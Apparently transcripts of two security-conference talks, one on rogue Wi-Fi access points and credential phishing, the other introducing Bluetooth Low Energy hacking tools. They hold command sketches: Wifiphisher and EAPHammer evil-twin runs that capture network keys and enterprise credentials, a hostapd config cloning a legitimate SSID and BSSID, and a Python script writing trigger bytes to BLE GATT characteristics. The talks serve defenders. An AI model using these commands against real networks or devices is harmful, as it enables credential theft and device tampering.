not. Are people in the wireless village going to make fun of me for even probably talking about this? Sure. But at the end of the day, this has gotten me so many credentials that it's kind of sad. And this has, you know, been the downfall of so many corporate networks that it's definitely worth mentioning because people use it and it works as an attack vector and people are tricked by it. Because at the end of the day, if you're watching this, you're probably a security minded person and you would probably say, oh man, there's no way that I would fall for it. But you know, take a step back and think of everybody in your organization that, you know, deals with Wi-Fi, that deals with, you know, just any device that's connected to the internet, would they fall for it? Well, at the end of the day, I just need a single person to fall for it. And that's it. I need one person to fall for it. And then I have your, you know, in this case, it's a, you know, pre-shared key. So WPA2, PSK network.
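To make that concrete, a hedged sketch of the kind of Wifiphisher run being described (the ESSID and the phishing scenario name here are placeholders — check the tool's current options rather than trusting this verbatim):

    # stand up a rogue AP named like the target and serve a firmware-upgrade style captive portal;
    # by default the tool will also deauthenticate nearby clients to encourage them to roam over
    sudo wifiphisher --essid "CorpWiFi" -p firmware-upgrade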
But there are other attacks, such as EAPHammer, that, you know, can mimic a corporate network, you know, that's WPA2 Enterprise, where a user would type in their credentials and then I could get hashed credentials, or clear text credentials if there's, you know, a GTC downgrade. But really at the end of the day, this all surrounds, you know, rogue access points and somebody standing up an access point that mimics your own and being able to detect that it's happening, because at the end of the day, I'd say that fewer than 10% of our clients even know when we stand up a rogue access point, that they're even looking for it. And even if they're looking for it, they may not even get the alerts. I've had plenty of clients that have said like, oh yeah, we have rogue access point detection. And, you know, after the pen test, we went back and looked at our logs and we got all these alerts, but, you know, they were never configured to go anywhere. They were never, you know, configured to get acted upon really is the best case for that. And again, it seems super silly that this is all my attack vector is — standing up a rogue access point and hoping to phish some credentials. But at the end of the day, it works. And just the fact that it works is scary enough because it's a really old style kind of attack really. Rogue access points like I was talking about, they can lead to stolen credentials if you're using say EAPHammer to get WPA2 Enterprise credentials, or in the case of Wifiphisher, you can use that for PSK. So just, you know, a shared network key like you probably have at home, you know, and that can lead then to a full internal network compromise. So it can lead to compromised workstations. It can also basically lead to data being exfiltrated, right? So if an end user connects to my access point, I can exfiltrate data off that system without it going through any of the normal controls or processes that it normally would. And then it can also allow users to circumvent corporate policies. So a lot of times, say your corporation blocks Netflix or Facebook or something, and users might connect their laptop or their mobile device that's work provided, they might connect it to another rogue access point in hopes that they can circumvent that and watch Netflix or do any other types of activities that would probably be blocked on any other network. So it's one of those things that end users, you know, may not always get tricked. They might willingly connect to other access points to get to, you know, whatever stuff that they want to that's being blocked by corporate policies. And so this is one of these matrices that I kind of like to reference and use. It might seem a little bit dense, but really at the end of the day rogue access points are kind of summed up in this way. So the easiest rogue access point for, you know, a corporation to detect is an exact match of whatever the SSID is, and SSID is just their wireless name. So say that's like, you know, home network 123. So you would see then a second home network 123 with a MAC address of 00:11:22, you know, all the way through 44:55. That would be the easiest to detect because that is completely different, you know, than whatever your normal MAC address would be. And that's just a hardware address that is associated with that wireless radio.
The next hardest would be then basically that exact same SSID with just some random characters, you know, just a randomly generated MAC hardware address. Then as you kind of like go down that difficulty scale, or up the difficulty scale, you're going to see it's going to be an exact match of that, you know, SSID with then a MAC address that's similar to the MAC addresses of the access points that you run. That might be harder for some, you know, for some intrusion prevention and detection software to detect, because it's something that's similar to what would be expected. And then if you're talking about a larger client, say, you know, say it's a bank, right — a bank will have multiple branches — say I went to one branch and copied a MAC address from that site and took it to another branch, you know, in the same town or, you know, same vicinity where wirelessly they won't touch, but that MAC address is at least valid on the network, right. And I stand that up as an access point. Well now the intrusion prevention and detection system is not going to detect me because it is technically somewhere in the system. The controller will just not have any idea of the geography behind that. And so that makes it harder to detect, you know, and then you keep going and now you can say your SSID is just similar but not an exact match to what that Wi-Fi would be, with again, random MAC addresses and then, you know, similar ones, and then going down that same spectrum. At the end of the day, this is just something that an attacker can use and kind of see like, okay, well, you know, what level of sophistication does your monitoring hardware, you know, and detection system have, what does that look like? Because for example here, say you were looking for an SSID that matched exactly and it was cloned from a MAC address of the same site. Well, what happens if there's some weird reflection or attenuation there that makes your wireless signals bounce from place to place? Well, if you're doing detection on a MAC address seen by a different access point, now all of a sudden that gets a lot harder and a lot more complicated of a thing to program and it's probably going to generate a lot of false positives. So it's one of these things that at the end of the day, it's easy to say, oh man, we need, you know, rogue access point detection, but rogue access point detection really is an entire, you know, suite of what is an attacker doing. And so it's really important just to kind of break down that nuance and see that, you know, some clients might see an exact match of 00:11:22:33:44:55, or maybe even random, but similar to known access points, or cloned from a different site or the same site. That's typically not going to get picked up and it allows an attacker like myself, who's already, you know, attacking wirelessly, not going to be seen. It allows me to basically not trigger any logs or trigger any detection, which again, you know, is there some software that can detect that? Absolutely. How many clients actually run it? Not a lot. Again, I've probably been detected less than 5 or 10% of the time, which is kind of surprising. And this kind of brings me into simple is not the same thing as easy, right? Like all of these things that I've talked about, they're simple to understand, but they may not be that easy to configure, right?
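To put a couple of those pieces into command form — the WPA2-Enterprise evil twin mentioned a moment ago and the cloned-identity rogue AP from this matrix — here's a rough sketch; every name, MAC, and flag value below is a placeholder, and options can differ between tool versions:

    # EAPHammer-style evil twin: serve a WPA2-Enterprise network and capture submitted EAP creds/hashes
    sudo ./eaphammer -i wlan0 --auth wpa-eap --essid CorpWiFi --creds

    # hostapd config for the harder-to-detect case: clone both the SSID and a BSSID
    # seen on a legitimate AP at another site
    cat > rogue-ap.conf <<'EOF'
    interface=wlan0
    driver=nl80211
    ssid=CorpWiFi
    bssid=aa:bb:cc:dd:ee:ff
    hw_mode=g
    channel=6
    EOF
    sudo hostapd rogue-ap.conf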
And that's an important distinction because just looking for excessive password spraying, you know, watching for devices that continually try credentials over and over and over and over again — there's been a number of sites where I basically just sprayed an access point with user credentials that I got off LinkedIn with the attempt of trying to authenticate to their access point. And eventually it worked. Sure, it took a long time. I spent all night trying to, you know, associate with credentials until a pair of them worked. But at the end of the day, that's all that it took. And if somebody was watching their logs, they would have seen, wow, 10,000 attempts. That seems a bit strange. But again, a lot of people don't look at their logs. And is that a simple thing for me to say? Yeah, absolutely. Is it easy? Definitely not. And then same thing, get alerts from rogue access points. A bunch of my clients will have, you know, software or some type of a controller available to them that will actually look for rogue access points. I mean, at home I run Ubiquiti. And it will, you know, if I check that box, it will determine, you know, hey, there's a rogue access point detected. I'm going to send you a push notification to your phone. There's a lot of end users, a lot of clients, a lot of corporations out there that don't even have that box checked. And even though their controller, even though whatever software they have is capable of seeing it, they don't even check the box. So they'll never even get that notification, even though their software, their controller, whatever it may be, has that, you know, out of the box as an option. And then have a plan for what to do when you do detect a rogue access point. That's one of those things that's like, cool, you detected a rogue access point. Now what? You know, depending on the size of your site, that might be just, you know, taking a walk around the office, or it might be trying to take a walk around a multi-acre, you know, area, or an entire campus, or an entire outdoor place, or an entire sporting arena. And so it's one of those things that, you know, you have to plan to the scale of your corporation, your company, your organization, whatever it may be, as to, you know, how are you going to locate these? Is your controller software capable of saying, you know, this was seen from this access point or from this location? Or is that something you're going to have to deploy? Is there going to have to be somebody trained in that? A lot of times it's not enough just to detect them. You have to locate them to see, you know, is this somebody that was doing this nefariously, or is it, you know, some error in the system? Being able to distinguish that and being able to have a game plan for when that happens will make it less of a panic situation, right? And a lot of that is having a wireless pen test, right? Like knowing where your weaknesses lie before you actually have to, you know, rely on your logs and rely on your locating, relying on pretty much everything, right? Really log your data. It's one of those things, it's simple. It's not easy, like to log your data and look at your logs.
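For the password spraying piece specifically, even a blunt log one-liner goes a long way; here's a hedged example against a FreeRADIUS box backing the wireless (the log path and message format vary by setup, so treat the field parsing as an assumption):

    # count failed 802.1X logins to spot spraying against the wireless
    grep -c "Login incorrect" /var/log/freeradius/radius.log

    # rough per-username tally of failures, highest first
    grep "Login incorrect" /var/log/freeradius/radius.log | awk -F'[][]' '{print $2}' | sort | uniq -c | sort -rn | head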
Because a lot of the times when I'm doing something, when I'm pen testing, all that data is probably logged somewhere, or at least can be enabled, or there's some logging software or, you know, something available to you, but people don't look at their logs. You know, sysadmins have a busy job and typically don't look at their logs or really investigate that stuff, or there may not even be a person dedicated to just wireless. It might just be the network security team and they don't even bother to ingest, you know, their wireless logs that are being generated. So again, all of these things, they're really simple. I feel a little bit sheepish giving a talk about how simple these things are. But each and every one of these things, you know, hasn't been done when I've been on a pen test at times, and it's allowed me to compromise a full entire organization, you know, because any number of these, you know, or combination of these weren't done. But again, they're simple, but they're not easy to enact. And it's just one of those things. Again, these are simple ways that somebody could get in that typically aren't covered. Now okay, so like kind of switching gears, there's a bunch of other information that wireless devices emit and there's far more than this, but I just kind of want to give out the basics of it. But really devices, you know, they can allow users to be tracked, you can identify the type of device. You can see what devices are connected to what networks, just using a tool like airodump-ng, which again is a super old tool, but still works great. You can take a look at the screen and if you're not familiar with the screen, then I'll kind of explain it right now. So if you look at the top left corner, there's BSSID and that is basically, you know, the access point hardware address. And then down below you see the access point and then devices connected to that access point. And if you just take a quick look, you can see the power levels will kind of associate roughly with, you know, distance away from that access point, the power levels, what you'd be looking at. And then you can see devices that are connected to that access point. Well, MAC addresses are basically handed out, or at least ranges of them are handed out, to hardware manufacturers and they can be identified by just a couple of octets. And so if you were to plug one of those in — hold on, I'll switch back. If you look at this, you'll see that basically, you know, that 18B430, if you were to plug that into Google, what that gets you is that it says, oh, that's Nest. And so from that I can say, okay, well, maybe they have a Nest camera on this network. Should I look for Nest cameras? You know, maybe there is a Nest thermostat, you know, and basically as an attacker, I don't need to know what your username or your password is. I don't need to know, you know, really anything else about your company, organization or wireless networks because I can see all of that in the clear. I can see, you know, at least what types of devices are connected. And so really it's one of these things, I know I'm going to keep saying it over and over and over and over, but it's simple to detect somebody like me on your network, but it's typically not easy.
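A hedged sketch of that OUI lookup workflow from the command line (the OUI database path differs across distros, and the monitor-mode interface name is an assumption):

    # let airodump-ng resolve vendors for you while it captures
    sudo airodump-ng --manufacturer wlan1mon

    # or look a prefix up directly in the local IEEE OUI database
    grep -i "18B430" /var/lib/ieee-data/oui.txt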
And really I just kind of want this to be one of those wake up calls that, you know, if you are a sysadmin, if you do control wireless networks, to kind of take a look at the security policies, the monitoring capability that you have, because at the end of the day you don't want to be scrambling if you do detect something or if you do detect a breach or some weirdness. And again, I think just going back to this last slide and showing, you know, check for password spraying, you know, check for any rogue access points that are in your area, have a plan on how to locate them, you know, understand what data somebody like me can see, you know, know how far your access points, you know, broadcast, you know, log the data that you do collect, that you have the capability of collecting and then look at them from time to time and notice if there's anything strange or weird, and then maybe build some policies out to alert you if anything funky does look like it's happening. Again, I think this is all simple. It's not easy always to configure. So hopefully that was helpful. I will be around in the wireless village if anybody wants to send me questions, and maybe I'll add some contact information to this on the page after it gets posted. But again, I hope it's helpful. I know this may seem like a super one-on-one easy mode talk, but each and every one of these aspects is something that, you know, one of my clients has potentially not done that has led me to compromise their organization. And if everybody looked at this and kind of had this in the back of their mind, if you're a sysadmin that controls networks, or maybe you're not even a sysadmin that controls your wireless networks, but you could bring this to them, it would go pretty darn far. Because at the end of the day, everybody has logging in place for their external network infrastructure and for their internal network infrastructure. But wireless for some reason is the extension of your internal network beyond your walls potentially. And it can let somebody like me, or somebody worse than me, somebody who actually is trying to do some harm to your network in, and you won't even see them. You won't even know that they're there. They will be, you know, for your eyes unseen. Again, hopefully it's helpful. I know this may seem like kind of like a one-on-one-ish talk, but it might be something that you need to hear. So take it forward. It's worth. And if you have any questions, feel free to contact me and I'll be in Discord. All right. Of course I'm in Discord. All right, Areas.
|
Wireless security is often overlooked, or deemed "good enough". However, for many companies, access to the corporate Wi-Fi means direct access to the internal network. This talk will demonstrate a variety of opening attacks performed by threat actors whose goal it is to infiltrate your organization. These tactics are detectable to the vigilant sysadmin, but all too often go unnoticed in a sea of log files. Check out this talk for access to the "Free Public WiFi".
|
10.5446/51660 (DOI)
|
Hey everyone, welcome to the basics of breaking BLE. I'm FreqyXin. I want to thank you for joining me and I want to thank the wireless village for featuring me today. Also I want to thank DEF CON for going into safe mode and allowing us the space to interact and learn with each other. I've got a few things planned for us today. We've got some just going over the basics of what BLE is as far as the technology, just how expansive it is. Some kind of tools and techniques that you can use for pen testing or just exploring Bluetooth low energy devices around you. So as you can see here on the desk I have a few devices. We have the bomb badge from DC 27 Team Einds. We have hackgnar's BLE CTF. If any of you have seen any of my in-person talks, I usually try to feature this piece a lot. I feel like it's a very easy entry point for people to learn how to interact with GATT services on Bluetooth devices. So going on we also have a Thingy:52. This is a development tool and learning tool from Nordic. This has its own application that lets you interact with sound and different gyroscopes and LEDs and all sorts of fun things. And then of course we have NODXOR's DC 27 badge that has a Bluetooth mesh network on it. We'll look at some of this and some interesting things that I found on the badge poking around looking for demonstration items for today. We actually also have the LG Phoenix LG 150. This phone is important because it's the only one that I have found so far that allows for live capture of the btsnoop file from an Android device into Wireshark. I feel that the live capture is important when you're auditing devices because you can actually see the command interactions between devices and the changes in real time. If I hit this button and this command comes across the wire, then it's probably pretty obvious that that is the command that's controlling that. And if you can see a difference in the variables then you have an easier time in reversing the commands and actually being able to find meaningful exploits or meaningful ways of interacting with devices. So going on, the last item that we have is the Adafruit Bluefruit LE. This has some services that I built on it for DC 27 actually. So we will look at actually cloning this device and spoofing it against a target. So just a short introduction to who I am. My name is Maxine Filcher. I also go by FreqyXin online. Security consultant with IOActive, Army veteran, graduated class of 2020 with a BS in Information Assurance and Cyber Security. I also have a minor in Law and Policy. I'm also a member of the SANS Women's Academy 2018 cohort where I earned the GSEC, the GCIH, and the GPEN. I am also in the process of studying for the GAWN. So just a small disclaimer, I'm not a Bluetooth developer by any means. But I have been teaching about Bluetooth hacking and just general Bluetooth concepts for a couple of years now. So I feel like I am fairly well-versed in this topic. So in any of my demonstrations, I always like to frame wireless security as greater than just Wi-Fi or just Bluetooth. In pen testing, when we see companies talk about wireless pen tests, generally they are talking about their Wi-Fi. And they are completely ignoring a lot of other vectors that could occur with wireless. So I always like to bring up this definition, I guess this contrast in definition. This weak definition from Wikipedia where it's wireless networks, which I mean I guess could be broadly interpreted.
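For anyone who wants to try that capture route without hunting down that specific handset, the more common (offline rather than live) workflow is pulling the HCI snoop log over adb — a rough sketch, with the log path being very device-dependent:

    # first enable Developer options -> "Enable Bluetooth HCI snoop log" on the phone,
    # exercise the app/device, then pull the log
    adb pull /sdcard/btsnoop_hci.log .

    # open btsnoop_hci.log in Wireshark and filter on btle or btatt to see the GATT traffic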
But I much prefer the NIST, which I believe is still current, it may have been updated. But the NIST definition of wireless enabled technologies, I feel it's more encompassing of everything that you could encounter. So we talk about wireless, just kind of continuing that discussion. And many different technologies, we have Bluetooth, Wi-Fi, ZigBee, RFID, NFC, Cell, SAT. And these come into a number of different industries. So medical is one that is growing pretty rapidly as far as Bluetooth low energy. And then of course IoT, the things around us, all these smart devices that really rely heavily on Bluetooth low energy to communicate. Then Industry 4.0, Bluetooth is starting to get more into automated systems within factories and smart buildings. And also smart automated HVAC systems or just building control systems. So Bluetooth is really starting to make its way into these important and sometimes high risk systems. So Bluetooth is becoming more of an important research topic and target for actually pen testing as we go and as the technology develops. So just a few basics about Bluetooth. You'll find it within the ISN band. So 2.4 to 2.485 gigahertz in this case for Bluetooth low energy. It comes in a few different flavors, you could kind of call them. Although the protocol stacks are different in some ways and similar in some ways. The original Bluetooth that came out, we refer to as Bluetooth classic or enhanced data rate. Any more you will find that in things like wireless headsets. So your Bluetooth headsets, anything where you're streaming data that needs larger packets and maybe higher throughput. That will generally go through on Bluetooth classic or BREDR is what it's known as now. Bluetooth low energy is what it is described as, it's a low energy protocol. It's intended to be used in devices that could run on a coin cell battery for up to a year. So that's a pretty heavy design specification for something that is low touch. You can put it somewhere and it's supposed to be able to work and you're not supposed to worry about the power and you can interact with it all day long. Something new that's emerging and I mentioned it with the Nodexor badge is Bluetooth mesh. Bluetooth mesh is actually, you can kind of think of it as a hat that goes on top of Bluetooth low energy. It uses some of the underlying components but it adds things like provisional keys and application keys. It's a mini to mini connection and it's very interesting. It can use pathways across other devices instead of nodes. It's a very interesting portion of the protocol but we aren't really going to get into Bluetooth mesh too much. So just some other numbers of course, you know, Bluetooth low energy is blowing up still all across the world. All these different technologies, I'm sure you have more than a few Bluetooth low energy devices around you right now. I also love to throw in little tidbits of history about Bluetooth. I think it's got kind of a fun origin with the name and kind of the intentions behind it. So you can see that if you've ever wondered where the Bluetooth symbol comes from, it's actually a mixture of two runic symbols, one for H and one for B. And this is actually for Harold Bluetooth who was the king of Norway and Denmark. He was seen as a great unifier of these countries and brought together these nations. 
If you've watched Vikings, the History Channel series, you might recognize the guy whose picture I've pasted up there, but yes, it's loosely based on the same person, on the same historical character or figure. Another person that I really love that is integral to the development of Bluetooth, but not really in sort of directly creating the protocol or anything like that, is Hedy Lamarr. I love the story of Hedy Lamarr. I love the story of her totally being just underestimated but being so brilliant. And for those who aren't familiar, she was an actress in the early part of the 20th century. And she came from Austria, fairly scandalous kind of background, had left her husband who had decided to supply arms to the Nazi party. She came to the United States and she befriended a man named George Antheil. And together they worked on a concept for creating a torpedo that was basically protected against jamming or the interruption of the signal, whether that was intentional or unintentional, for torpedoes that were fired from either submarines or allied ships. A lot of times these torpedoes, when they were fired, they would either get jammed or they would lose connection and sometimes they could actually backtrack around and hit the ship that fired the torpedo originally. So this at the time was actually a fairly large concern and it was something that was kind of an operational hazard that you had to put up with. And together they came up with this concept of frequency hopping spread spectrum. And this is where two devices, two transceivers, would have a set channel-hopping sequence, or a channel set, within them that they would hop across at a set interval and at a set rate. So once these were loaded in, they would hop across the frequency spectrum in a way that would evade pinpoint jamming or just any kind of natural interference, since it was skipping across frequencies. So this was actually a fairly unique idea at the time. It was based on player pianos — synchronized player pianos — which is kind of cool. If you have more interest about the story, there is an amazing documentary on Netflix called Bombshell: The Hedy Lamarr Story. Highly recommend that you check it out. It's a little bit sad, but if you're curious about the background, it's a really amazing story. So let's get into a little bit of terminology. So as far as devices within Bluetooth connections, we can think about devices in two ways, central and peripheral. So your central devices are generally going to be your phone or the device that the user is actually interacting with. So whether that's a tablet or a laptop or a TV or something like that, where it's actually initiating the connection to whatever peripheral device. Any kind of device that you're going to connect to, that's a peripheral device. It's not something that you are directly interacting with via an application on your phone. That's generally going to be a peripheral. So connections are also something that's important in Bluetooth, obviously. It's a wireless protocol, so there has to be some sort of way the connections are handled. Bluetooth Low Energy, just like Bluetooth, has set channels where it advertises itself to central devices that may be looking to connect to it. So Bluetooth Low Energy has three set advertising channels that it will broadcast across: 37, 38, and 39. And there are also four advertising PDU types. I won't go over those, you can look them up.
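If you want to actually watch those advertisements go by on a Linux box, a couple of stock BlueZ commands are enough for a first look (hcitool is deprecated but still widely present; the adapter name is an assumption):

    # scan for BLE advertisers on the first adapter
    sudo hcitool -i hci0 lescan

    # or watch the raw HCI traffic, including advertising reports, as it arrives
    sudo btmon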
They don't really have too much impact on what we're going to talk about today. So we also have 37 data channels for Bluetooth Low Energy, separated by two megahertz across the spectrum. And when we're also speaking about connections, we think about them in two phases, sort of. Once you see the advertising of a device that you want to connect to, say, from your phone, you will initiate the pairing process. I'm fairly confident that most people are familiar with the pairing process. But it's where you initiate a wireless connection. And these come in kind of two phases. So you have your basic pairing session where you're unbonded, or you've passed your short-term keys between the devices. So they have established a connection, but it's not trusted on certain levels. And the devices haven't been placed into each other's, sort of, trusted devices list. So once you create a bonded connection, those devices are actually transferring long-term key information between each other. In most cases, they'll go into a trusted device list, so that either the short-term key pairing process can be skipped, or there's no need to even initialize the pairing process again at all. You can just, you know, whenever you're in proximity of the device, it will just automatically connect to you. So that's one of the benefits of bonding. Another benefit of bonding is you will oftentimes have greater leeway in the amount of kind of tolerance for fuzzing on a device. So if you just have a short-term key pair with a device, and you try to start fuzzing GATT services, there's a good likelihood that that device will end that pairing. Once you've bonded with a device, there is a greater chance that that connection will survive any kind of fuzzing that you do on the GATT services. So we can talk a little bit about sort of the evolution of the Bluetooth protocol stack. We talked about how it kind of comes in multiple flavors, and you can see that we have classic BR/EDR there. And then you can see the hybrid version of Smart Ready, and now Bluetooth Smart, which most new Bluetooth low energy devices coming out should be Bluetooth Smart. Although most phones will have the ability to use BR/EDR in the case of, say, Bluetooth headphones or that sort of thing. There is also a new audio protocol that is coming out, a new Bluetooth low energy audio protocol. It was announced earlier this year. I haven't personally seen a lot of specifications on it, but I'm sure that there are people that can answer lots of questions about it already. But it's interesting. I'm excited from a security researcher perspective to get my hands on some of the devices, just because it sounds like it might have some issues, but we'll have to see. So yeah, just one of the basic components of the protocol stack that we're going to really pay attention to today is GATT. I've already mentioned it a couple of times, but it's the generic attribute profile. These are where the profiles of the services that a device can offer are stored. So you can think about this as sort of a catalog of things that a device can do. Whether that's measuring heart rate or giving temperature or measuring humidity levels, there's a GATT service and there's a way for that information or that service to be interacted with. So there is a way to retrieve that temperature or that humidity measurement through the GATT services. Primarily, we're going to be interested in GATT services today. Okay, so we've already talked about that.
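To tie the pairing-versus-bonding distinction to something you can type, here's roughly what it looks like with bluetoothctl on Linux (the MAC address is a placeholder):

    bluetoothctl
    # inside the interactive shell:
    scan on
    pair AA:BB:CC:DD:EE:FF      # performs the pairing/key exchange
    trust AA:BB:CC:DD:EE:FF     # marks it trusted so it can reconnect without prompting
    connect AA:BB:CC:DD:EE:FF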
So when I talk about GATT hacking, what I'm really talking about is the abuse of read or write privileges on a device over its GATT services. In the case of iOS, read privileges can be abused fairly easily, and you can do things like retrieve the phone's username, the battery level, and the OS version. That may not seem like much of an issue on the surface, but once you start poking lower into the protocol, especially with the proof of concept called apple_bleee, you can see that there are some significant interactions available over GATT and some very significant information disclosures from iOS. A few simple write-privilege abuses that I have seen in devices I've pen tested are just sending simple codes: picking out a GATT service and starting to fuzz values. In some of the real-world cases I've seen, writing the hex value 0x08 enabled me to set up a new PIN between the devices, so now I'm defeating one of the very few security measures you have for controlling Bluetooth connections. Further still, I've been able to take over the firmware update mode: writing 0x01 to a GATT service would actually allow you to push firmware to a device. You obviously can't get much lower-level interaction than potentially placing malicious firmware onto a device; at that point, who knows, you own that device. On other devices I've seen, writing 0x02 to a specific GATT service would start a heating cycle, so there is potentially real physical danger there. So, Bluetooth Low Energy does have security. It has developed through the years, mainly in response to security research: a big set of vulnerabilities comes out and the technology has to respond in a fairly dynamic way, or they risk really losing their customer base. The Bluetooth SIG has done a fairly decent job of responding to security researchers and trying to get chip manufacturers and developers on board with everything. But there's still a lot of space for growing, and a lot of space for research. For Bluetooth Low Energy, I would say the current standard is 4.2, although BLE 5.0, the new standard that came out, has some pieces that strengthen Just Works pairing by introducing some nonce values; the more entropy, the better. We have protections against man-in-the-middle, we have protections against eavesdropping, and theoretically there's authentication via pairing and bonding, but we can see that oftentimes that's not the case and it can be abused pretty easily. As for the Bluetooth vulnerabilities that have come out in the past: when I started getting into Bluetooth pretty heavily, BlueBorne was pretty fresh. It was fairly new and it seemed to scare a lot of people. That's when I noticed Bluetooth security research really starting to kick up again; it seemed like it had died off before that. Since then there have been major vulnerabilities released every year. SweynTooth was released earlier this year, and then they released a new vulnerability set for SweynTooth just a couple of weeks ago. An interesting trivia piece about SweynTooth: it's actually named after the son of Harald Bluetooth, so that's a kind of cool marketing piece they worked in there.
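To make that write-privilege abuse concrete before we dig into SweynTooth, here is a minimal sketch using the Python bleak library (again my choice for illustration, not a tool from the talk). The device address, characteristic UUID, and byte values are hypothetical placeholders; on a real target they come from enumerating GATT and reversing the companion app's traffic.

```python
# A minimal sketch of the write-abuse pattern, assuming the Python "bleak" library.
# Address, characteristic UUID, and values are hypothetical placeholders.
import asyncio
from bleak import BleakClient

TARGET = "AA:BB:CC:DD:EE:FF"                          # hypothetical device address
CHAR_UUID = "0000ffe1-0000-1000-8000-00805f9b34fb"    # hypothetical writable characteristic

async def poke(value: bytes) -> None:
    async with BleakClient(TARGET) as client:
        # response=False sends a Write Command (no acknowledgement), the same
        # thing nRF Connect does when you pick "command" instead of "request".
        await client.write_gatt_char(CHAR_UUID, value, response=False)

# The kind of single-byte trigger mentioned above (re-pair, DFU, heater, ...).
asyncio.run(poke(bytes([0x08])))
```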
So SweynTooth, since it's brand new, we'll talk about it. It really starts to attack the protocol in ways that I personally haven't been testing: fuzzing the header values and fuzzing the protocol in ways that just make things stop working. There are a lot of denial-of-service vulnerabilities within it, a lot of deadlocks and security bypasses, and it's fairly expansive; a lot of vendors are impacted by SweynTooth. It's a pretty cool piece of research. I personally haven't had a lot of time to jump into it, but I have read through it quite a bit and it's pretty interesting. These are just a few of the Bluetooth tools out there that you can use. Some of these are proof of concepts, but they have neat scripts that you could either alter or just use as they are. The first tool we're going to look at is the Ubertooth One. Let me switch over here; I have one right here. It's an older device, a few years old now, but it's still probably the best way to ingest externally viewed Bluetooth packets into Wireshark. I say externally because this is what I consider looking from the outside in at a Bluetooth connection between devices. Generally you won't see a lot, because things should be encrypted, although I have seen devices that claim to be encrypting but aren't actually doing it, so you're able to pull commands right out of the air. This is still probably the best tool for that use case: checking encryption, or checking how well a device's connection holds up against eavesdropping and passive sniffing. The GreatFET One is a tool that I'd still consider to be in development for this purpose. The Quincy was announced as the first add-on board for it that would allow full-spectrum sniffing of Bluetooth Low Energy. So instead of having to use an Ubertooth, which is locked to one advertising channel at a time, you would be able to sniff across all of the channels at once and see basically all of the Bluetooth Low Energy traffic that's going on, which is much easier to manage for mass sniffing operations. But as of today there's still no release date, and I haven't heard anything about a price. Maybe that will change with DEF CON coming up; this is being recorded beforehand, so maybe there has already been an announcement, and if that's the case, disregard this portion. Another tool that you probably won't get to use unless you have a lot of money or work for a bigger employer is the Ellisys system, which relies on SDR. It's the same kind of concept as the Quincy in that it's doing a mass spectrum capture: it tries to capture all of the Bluetooth packets it possibly can, and then you can go through, sort by connection, and see everything. This system goes even further, and in some cases will strip the encryption off of the packets, so the software is actually pretty cool. I've had the chance to use one of these systems, and it's a very powerful tool that you can do a lot of really meaningful research with, but there is a huge price tag attached to it. So that brings us to nRF Connect. nRF Connect is what I generally use first on engagements, and I will exhaust every avenue possible with nRF Connect, because it's free and it installs on just about any smart device, well, Android or iOS.
So it's highly available, it's extremely simple to use, it allows for abuse of GATT services, and it also allows for cloning and spoofing, so it's a fairly useful tool. That's where I like to start all of my engagements, because if I can prove there is impact from this free and highly available tool, then chances are you probably have larger problems, and someone with more technical ability or more powerful tools is likely going to have even greater impact on your systems. So let's take a low-hanging-fruit-first approach. I always start with nRF Connect. It was intended for debugging, but it works wonderfully for the purposes I need. One of the great things you can do with it is record macros. Sometimes devices will only allow momentary connections, just long enough for two devices to pass short-term keys and for one to decide, "I don't want to talk to you because I don't know who you are." Still, in that period of time, maybe two or three seconds, you have a window to send GATT commands, and if you can capture that as a macro and get a command through to the device, you may actually get interaction with it even though you never establish a long-term bonded session, just that momentary connection. So I really enjoy the macro feature, and of course you can also export the logs, which helps with reporting. The nRF Sniffer we won't actually talk about. Bettercap is a tool capable of letting you interact with the GATT services of a device from a Linux machine using a BLE dongle. Kismet has the ability to do this too, but I feel like Bettercap has a slightly better UI for it. It can be a little bit difficult to install, but you get the ability to send requests and commands over GATT, so it's still a very powerful tool if you're interested in doing this from a laptop or a desktop rather than a mobile device. Another powerful tool on a desktop machine is Scapy. Scapy gives you the ability to script, and that's very powerful once you start looking at these deeper interactions. If you wanted to follow along with the SweynTooth vulnerabilities, you could craft packets using the Scapy library to attack those specific pieces of the protocol, push different kinds of data at them, and potentially push them over. So if you're looking to do that deeper kind of penetration testing or research on Bluetooth Low Energy, the Scapy library is definitely something you'll want to check out. Another essential tool that I use on just about every one of my pen tests of Bluetooth Low Energy devices is Android Debug Bridge. For those who might not be familiar with it, ADB allows you to create a PC interface to your Android device over USB. Most phones won't allow you to do a live capture of the btsnoop log, which is where Bluetooth Low Energy connections and data get logged. In the case of the LG M150 that I have here, it will allow us to do a live capture straight into Wireshark, and we'll actually look at that shortly. There are some basic installation instructions if you're not familiar with ADB; it's very simple to set up and very easy to get going with. I mentioned Kismet earlier: if you're not familiar with it, Kismet also supports Bluetooth Low Energy, though with somewhat limited functionality, and they may be increasing that as we speak.
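Back to Scapy for a second: here is a rough sketch of what crafting a raw BLE link-layer frame looks like with its bluetooth4LE layers. This is the same general approach the SweynTooth researchers take (they add custom nRF52 dongle firmware to actually transmit; this code alone only builds bytes), and the exact layer and field names here are assumptions to check against the Scapy version you have installed.

```python
# A rough sketch of building a raw BLE link-layer frame with Scapy's BLE layers.
# Layer/field names are assumptions from scapy.layers.bluetooth4LE; verify them
# against your Scapy version. This only constructs bytes, it does not transmit.
from scapy.layers.bluetooth4LE import BTLE, BTLE_ADV, BTLE_ADV_IND

# An advertising PDU on the standard advertising access address.
adv = BTLE(access_addr=0x8E89BED6) / BTLE_ADV() / BTLE_ADV_IND(
    AdvA="aa:bb:cc:dd:ee:ff",       # hypothetical advertiser address
)

adv.show()                          # dissected view of every field
print(bytes(adv).hex())             # the on-air byte string

# SweynTooth-style testing then means deliberately corrupting fields (lengths,
# control opcodes, channel maps) before handing frames to a radio front end.
```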
Kismet, in any case, is definitely growing in its functionality and capabilities every day. And we've mentioned apple_bleee, a wonderful proof of concept for the security issues that are really inherent in the iOS Bluetooth Low Energy stack. It's a lot of fun. I've done some private talks where I've attacked entire rooms full of people and AirPods pop-ups appear on everyone's phones. So it's a lot of fun, but it can also be scary for Apple users to see how much interaction you can get with their devices just through Bluetooth Low Energy. The BlueBorne scanner was deprecated, but I've actually seen it back on the Play Store, and I can still download it and still use it. The likelihood that you're going to find a device that actually pops up as vulnerable is very low at this point, though; most manufacturers have patched or updated against it. A couple of years ago you could walk into a Best Buy, run the BlueBorne scanner, and almost every smart display TV they had would pop up on the scanner and give you all kinds of information, and from there you could use proof-of-concept scripts to actually attack those TVs. But those are different stories; as far as I know, BlueBorne is pretty much patched up and no longer a risk. So, a few challenges that we run into in Bluetooth Low Energy from a security-researcher standpoint. Most modern connections are encrypted, so they're hard to see from the outside. Unless there is a companion application on Android that I can use Android Debug Bridge against, it's very hard to reverse commands; 